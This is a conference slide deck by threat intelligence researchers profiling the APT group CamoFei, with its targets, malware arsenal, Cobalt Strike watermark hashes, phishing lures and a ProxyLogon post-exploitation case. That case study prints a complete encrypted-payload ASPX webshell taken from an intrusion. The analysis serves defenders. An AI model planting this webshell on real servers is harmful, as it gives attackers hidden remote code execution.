# Unmasking CamoFei ###### An In-depth Analysis of an Emerging APT Group Focused on Healthcare Sectors in East Asia Still Hsu, DuckLL ----- ### About us ###### Still Hsu (Azaka) • Threat Intelligence Researcher @ TeamT5 • Non-binary (they/them) • Part-time streamer ###### Zih-Cing Liao (aka DuckLL) • Sr.Threat IntelligenceResearcher @ TeamT5 • Speaker of Conferences: Black Hat Asia, HITB, HITCON, CODE BLUE • UCCU Hacker Core Member ----- ### AGENDA ###### 01 Introduction 02 TTPs 03 Case Study 04 Conclusion ----- ## Introduction ----- ### CamoFei - China-nexus APT threat group - First seen: End of 2019 - Footprint Concealing - Malware: - Cobalt Strike - DoorMe - IISBeacon - Timinp - MGDrive - AukDoor - CatB Ransomware ----- ### Related Work ###### ◆ Positive Technologies in 2021 ◆ ChamelGang ◆ ProxyShell Exploit ◆ Malware - BeaconLoader & Cobalt Strike - ProxyT - DoorMe https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/ ----- ### Target Country - Taiwan, Vietnam, Philippines, Thailand, India, Turkey, Brazil, Hong Kong - Russia, US, Japan, Afghanistan Lithuania, Nepal ----- ### Target Industry ----- ### Target Industry ----- ### Critical Infrastructure ###### Energy Water Communication Transportation Finance Healthcare Government High-Tech ----- ### Covid-19 https://ourworldindata.org/explorers/coronavirus-data-explorer ----- ### Motivation ###### Money PII DoS Knowledge Information Operation ----- ### Common Issues ###### OT Security Lack of Security Staff Complex System Outdated Hardware and Network and Software ----- ### News https://edition.cnn.com/2023/06/12/politics/cyberattack-hospital-closure/index.html https://www.cnbc.com/2023/07/10/hca-healthcare-patient-data-stolen-and-for-sale-by-hackers.html https://www.bleepingcomputer.com/news/security/north-korean-ransomware-attacks-on healthcare-fund-govt-operations/ ----- ### HITCON Zero-day ----- ## TTPs: Initial Access ----- ### Spear phishing ----- ### Exploitation ###### https://proxylogon.com/ ----- ### Exploitation ----- ## TTPs: Malware ----- ### Primary Arsenal - Cobalt Strike - Special loader - MGDrive - Google Drive tool - AukDoor - Linux backdoor - DoorMe - IIS-based backdoor - Timinp - CatB Ransomware ----- #### Cobalt Strike (Custom Loaders) ----- ### Cobalt Strike (Watermark) ``` Date MD5 Watermark 2020-05-20 9a221336204d671fafd830c84d9bdc26 985457035 2021-02-26 897bfb316d2e8ff72031a3332842be0f 1421888813 2021-09-17 90cc1835823d5f86cd1947b03e6111a9 1028153346 2021-09-18 6a3c69384237078b6ab03ab7c38970ca 1028153346 2021-10-26 76449d55107fcc7cd666514892879aae 1570652404 2022-03-24 426ee09eaa0d8940ac5f730d1c48be7c 164069343 2022-04-21 634c08a0dac337f3c2cde4dfdd03ca5f 1028153346 2022-04-21 9755ee49da758de56286ee9fc512ed5d 363348564 2023-02-08 9c5658ba8a8ab9e92c96f13247d3b17e 373441684 2023-02-15 6171eaf5a3ac9500c8043d2fecc589cd 1444764933 2023-03-10 0d76b20ab79afaf650aa12ea7e448d2f 1578452238 2023-04-21 900ead32a061c7047a4e438589102d25 0 2023-06-28 f8c137c83b6dfdeb9f0403ea7e2c51c7 1299761752 ``` ----- ### MGDrive ###### • Government agency • MGD.dll ----- ### DoorMe ###### Compiler-level obfuscation ----- ### DoorMe ----- ### Timinp ----- ### Timinp ----- ### CatB Ransomware - Discovered in a TW ###### telecommunication agency - Uses the same MSDTC chain ###### they’ve been using for 3+ years - Uses similar decoding ###### mechanism - Signed with valid certificate ###### from “coolschool” ----- ### CatB Ransomware - Signed with valid certificate from ###### “coolschool” - Several samples linked to the certificate ###### contains icon hash linked to Case Study #1 ----- ### CatB Ransomware - Matches pattern used by same actor ###### discovered in other cases - `[A-Z][\d]{3,4}@protonmail.com` - BTC wallet only had tiny bit of traffic on ###### April 29, 2023 ----- ### CatB Ransomware - Similar samples use identical email pattern & provider - Uses .bak9 extension - Matches another ransomware incident against Indian medical university - Also linked to a Chinese-nexus group based on INCERT investigation ----- ### CatB Ransomware - Similar samples use identical email pattern & provider - Uses .bak9 extension - Matches another ransomware incident against Indian medical university - Also linked to a Chinese-nexus group based on INCERT investigation https://indianexpress.com/article/cities/delhi/aiims-cyber-attack at-least-five-servers-infected-have-data-of-3-4-crore-patients 8297028/ ----- ### Use of Various Hacktools ----- ### Use of Various Hacktools ----- ## TTPs: Infrastructures ----- ### Use of Cloud Services ##### GitHub Google Drive ###### (C2 download) (MGDrive, Timinp) ----- ### C2 Stations ###### 4 Romania USA 1 4 ----- ## Case Study #1 Spear phishing -> Healthcare ----- ### Spear phishing #1 - Email was sent via a legitimate email server ###### from a tertiary school - Compromised and abused ###### ◆ Fake resume as lure - Self-extracted RAR - Contains a resume, encoded Cobalt Strike ###### Beacon and its loader ----- ### Spear phishing #1 ----- ### Spear phishing #2 - Fake resume for volunteering at a certain ###### healthcare organization as lure - Self-extracted RAR - Contains a resume, encoded Cobalt ###### Strike Beacon and its loader ----- ### Spear phishing #2 ----- ### Spear phishing #3 - Generic dental advice as lure - Self-extracted RAR - Contains a document, custom loader, and ###### encoded Cobalt Strike beacon inside an encrypted ZIP file - Encrypted ZIP embedded - Contains “CFG1D19” - Decimal-encoded payload - Still used by the same group till this day ----- ### Spear phishing #3 ----- ### Summary - All the spear phishing files were prepped ###### almost simultaneously with the launch of the attack - May 2020 - Heavily abused Cobalt Strike - Uses decimal-encoded payload - Part of their arsenal even till present ###### day ----- ## Case Study #2 ProxyLogon Post-exp ----- ### Attack Flow ----- ### Attack Flow ``` <%@Page Language="C#"%> <% HttpContext h=HttpContext.Current; string s="c01bc5249636a40d"; h.Application.Set("k",s); try { byte[] k=Encoding.Default.GetBytes(s),c=h.Request.BinaryRead(h.Request. ContentLength); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k ,k).TransformFinalBlock(c,0,c.Length)).CreateInstance("U"); }catch(Exception e) { } %> ``` ----- ### Attack Flow ----- ### Attack Flow ``` System.Data.DataSet ds = new System.Data.DataSet(); System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection); System.Data.SqlClient.SqlDataAdapter da = new System.Data.SqlClient.SqlDataAdapter(cmd); da.Fill(ds); System.Data.DataTable dataTable = ds.Tables[0]; if (dataTable.Rows.Count==0) { lblInfo.Text = "没有需要导出的数据!"; lblInfo.ForeColor = System.Drawing.Color.Blue; return; } ``` ----- ### Attack Flow ----- ### Summary - Attack occurred around mid-September ###### 2021 - Leverages unpatched exploits and ###### numerous open-source projects as part of the post-exploitation actions - Deploys various webshells and .NET ###### backdoors - Relies heavily upon the MSDTC DLL ###### hijacking technique ----- ## Conclusion ----- ### Key Takeaways ###### ◆ CamoFei has launched massive attacks all over the world ◆ APT attacks targeting healthcare is increasing and expanding ◆ CamoFei TTP - Abuse legitimate Windows service as a launcher - Abuse cloud service for anti-tracking - Use ransomware to erase the traces ----- ### Mitigation ###### ◆ Healthcare should strengthen its security capabilities ◆ Double-check emails ◆ Update and patch software vulnerabilities ◆ Limit the usage of cloud services ----- ## THANK YOU! ###### Zih-Cing Liao duckll@teamt5.org ###### links.azaka.fun still@teamt5.org -----